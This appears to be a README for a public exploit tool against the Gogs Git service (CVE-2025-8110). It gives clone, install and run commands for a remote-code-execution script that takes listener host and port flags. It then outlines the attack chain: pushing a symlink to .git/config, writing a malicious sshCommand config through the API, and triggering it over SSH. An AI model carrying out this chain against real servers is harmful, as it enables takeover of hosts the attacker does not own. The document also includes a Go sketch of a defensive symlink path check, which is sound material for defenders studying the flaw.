## https://sploitus.com/exploit?id=950D847D-3640-59D5-A5A4-1BB67F683717
# GOGS RCE CVE-2025-8110
Gogs is a lightweight, self-hosted Git service, similar to a private version of GitHub, designed to run easily on low-resource servers. CVE-2025-8110 is a critical vulnerability that allows an attacker to bypass path restrictions by using symlinks. By uploading a malicious symlink pointing to `.git/config`, an attacker can use the Gogs API to write a malicious config file containing the `sshCommand` parameter and achieve RCE on the host server.

---
## Usage
1. Clone this repo to your local machine:
```shell
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE
```
---
2. Install all dependencies
```shell
pip3 install -r ./requirements.txt
```
---
3. Run the script
```shell
# Print help
python3 ./cve-2025-8110.py --help
# Execute the attack chain, including the registration step
python3 ./cve-2025-8110.py --url http:// -lh -lp
# Execute the attack chain, skipping registration (useful when the register function returns an error)
python3 ./cve-2025-8110.py --url http:// -lh -lp -U -P
```
---
## How does it work
This script follows an attack chain involving these steps:
```
1. Register & authenticate a throwaway account (Register skipped if creds are provided with -U and -P flags)
2. Obtain an API bearer token
3. Create an auto-initialised repository
4. Clone the repo locally and push a relative symlink malicious_link -> .git/config
5. PUT the malicious git config (with sshCommand) through the symlink via the PutContents API
6. Trigger the sshCommand by cloning the repo over SSH
```
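Steps 4 and 5 work because a lexical path check accepts `malicious_link` while the write lands in `.git/config`. The Go sketch below is an added example of the defensive check, not code from this repository and not the Gogs fix; `CheckWriteTarget` and `ErrUnsafePath` are hypothetical names, and the worktree in `main` is constructed.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var ErrUnsafePath = errors.New("unsafe write target")

// CheckWriteTarget (hypothetical helper) vets a user-supplied path in a worktree before a write.
func CheckWriteTarget(worktree, rel string) error {
	clean := filepath.Clean(filepath.FromSlash(rel))
	parts := strings.Split(clean, string(filepath.Separator))
	if filepath.IsAbs(clean) || parts[0] == "." || parts[0] == ".." {
		return fmt.Errorf("%w: %q leaves the worktree", ErrUnsafePath, rel)
	}
	if strings.EqualFold(parts[0], ".git") {
		return fmt.Errorf("%w: %q is inside .git", ErrUnsafePath, rel)
	}
	// Lexical checks pass "malicious_link"; Lstat each component to catch a committed symlink.
	cur := worktree
	for _, p := range parts {
		cur = filepath.Join(cur, p)
		fi, err := os.Lstat(cur)
		if errors.Is(err, os.ErrNotExist) {
			return nil // nothing on disk past this point, so no link to follow
		}
		if err != nil {
			return err
		}
		if fi.Mode()&os.ModeSymlink != 0 {
			return fmt.Errorf("%w: %q is a symlink", ErrUnsafePath, rel)
		}
	}
	return nil
}

func main() {
	wt, _ := os.MkdirTemp("", "wt") // constructed worktree mirroring step 4
	defer os.RemoveAll(wt)
	os.MkdirAll(filepath.Join(wt, ".git"), 0o755)
	os.Symlink(filepath.Join(".git", "config"), filepath.Join(wt, "malicious_link"))
	for _, p := range []string{"README.md", "malicious_link", ".git/config"} {
		fmt.Println(p, "->", CheckWriteTarget(wt, p))
	}
}
```

A check followed by a separate write can still race with a change to the worktree, so the check belongs in the same locked section as the write.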
## Credits
This script was made using the PoC by zAbuQasem (https://github.com/zAbuQasem).